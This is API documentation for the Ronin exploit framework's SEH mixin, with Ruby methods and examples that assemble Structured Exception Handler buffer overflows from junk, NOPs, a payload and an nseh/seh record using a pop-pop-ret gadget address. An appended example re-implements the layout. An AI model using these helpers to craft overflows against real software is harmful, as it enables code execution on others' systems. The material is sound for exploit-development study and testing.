Module: Ronin::Exploits::Mixins::SEH

Includes:
Binary, NOPS, Text
Included in:
SEHOverflow
Defined in:
lib/ronin/exploits/mixins/seh.rb

Overview

Methods for building Structured Exception Handler (SEH) buffer overflows.

Example

include Mixins::SEH

def build
  nseh = 0x06eb9090 # short jump 6 bytes
  seh  = 0x1001ae86 # pop pop ret 1001AE86 SSLEAY32.DLL

  buffer = seh_buffer_overflow(length: 1024, nops: 16, payload: payload, nseh: nseh, seh: seh)
  # ...
end

If you want more control over how the buffer is constructed:

include Mixins::SEH

def build
  nseh = 0x06eb9090 # short jump 6 bytes
  seh  = 0x1001ae86 # pop pop ret 1001AE86 SSLEAY32.DLL

  buffer = junk(1024) + seh_record(nseh,seh) + nops(16) + payload
  # ...
end

Since:

  • 1.0.0

Constant Summary

Constants included from NOPS

NOPS::NOPS

Instance Method Summary

Methods included from NOPS

#nop, #nops, #perform_validate

Methods included from Binary

#pack, #perform_validate, #platform

Methods included from Text

#junk

Instance Method Details

#seh_buffer_overflow(length:, nops: nil, payload:, nseh:, seh:) ⇒ String

Builds a SEH buffer overflow.

Examples:

nseh = 0x06eb9090 # short jump 6 bytes
seh  = 0x1001ae86 # pop pop ret 1001AE86 SSLEAY32.DLL

buffer = seh_buffer_overflow(length: 1024, nops: 16, payload: payload, nseh: nseh, seh: seh)

Parameters:

  • length (Integer)

    The desired length of the buffer.

  • nops (Integer, nil) (defaults to: nil)

    The optional number of NOPs to add before the payload.

  • payload (#to_s)

    The payload to add to the buffer.

  • nseh (Integer)

    The address of the next SEH record.

  • seh (Integer)

    The address of the SEH exception handler for the record we want to call.

Returns:

  • (String)

    The SEH buffer overflow.

Since:

  • 1.0.0



# File 'lib/ronin/exploits/mixins/seh.rb', line 121

def seh_buffer_overflow(length: , nops: nil, payload: , nseh: , seh: )
  payload = payload.to_s
  payload = self.nops(nops) + payload if nops

  seh_record = self.seh_record(nseh,seh)

  buffer = String.new(encoding: Encoding::ASCII_8BIT)
  buffer << junk(length - payload.bytesize - seh_record.bytesize)
  buffer << payload
  buffer << seh_record

  return buffer
end

#seh_record(nseh, seh) ⇒ String

Creates a SEH record.

Examples:

nseh = 0x06eb9090 # short jump 6 bytes
seh  = 0x1001ae86 # pop pop ret 1001AE86 SSLEAY32.DLL

buffer = junk(1024) + seh_record(nseh,seh) + nops(16) + payload

Parameters:

  • nseh (Integer)

    The address of the next SEH record.

  • seh (Integer)

    The address of the SEH exception handler for the record we want to call.

Returns:

  • (String)

    The SEH record.

Since:

  • 1.0.0



# File 'lib/ronin/exploits/mixins/seh.rb', line 87

def seh_record(nseh,seh)
  pack(:machine_word,nseh) + pack(:machine_word,seh)
end
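The byte layout that #seh_buffer_overflow and #seh_record produce, as an added stand-alone example (not Ronin's own code): it mirrors the documented junk + payload + record ordering with assumed helpers (32-bit little-endian machine words, 'A' as junk filler, 0x90 as the NOP byte), rejects a length too small to hold the payload and the record instead of producing a wrong-sized buffer, and parses a built buffer back into its parts so the payload and record offsets can be checked.

```ruby
# Added example mirroring the layout documented for seh_buffer_overflow.
# Assumptions (not part of the Ronin API): 32-bit little-endian machine
# words, 'A' as the junk filler byte, 0x90 as the NOP byte.
MACHINE_WORD_SIZE = 4

def pack_word(value)
  [value].pack('V') # 32-bit little-endian (assumed platform)
end

def junk(count)
  ('A' * count).b
end

def nops(count)
  "\x90".b * count
end

# Two machine words: next-record pointer, then handler address.
def seh_record(nseh, seh)
  pack_word(nseh) + pack_word(seh)
end

# Same ordering as the documented source: junk, [nops +] payload, record.
# Raises when the requested length cannot hold the payload and the record.
def seh_buffer_overflow(length:, nops: nil, payload:, nseh:, seh:)
  payload = payload.to_s.b
  payload = nops(nops) + payload if nops
  record  = seh_record(nseh, seh)
  filler  = length - payload.bytesize - record.bytesize
  if filler < 0
    raise ArgumentError, "length #{length} too small for payload and SEH record"
  end
  junk(filler) + payload + record
end

# Parses a buffer built above back into its parts, given the payload size
# (NOPs included); returns the offsets and the decoded record words.
def seh_layout(buffer, payload_size)
  buffer         = buffer.b
  record_offset  = buffer.bytesize - 2 * MACHINE_WORD_SIZE
  payload_offset = record_offset - payload_size
  nseh, seh = buffer.byteslice(record_offset, 2 * MACHINE_WORD_SIZE).unpack('VV')
  { payload_offset: payload_offset, record_offset: record_offset,
    nseh: nseh, seh: seh }
end
```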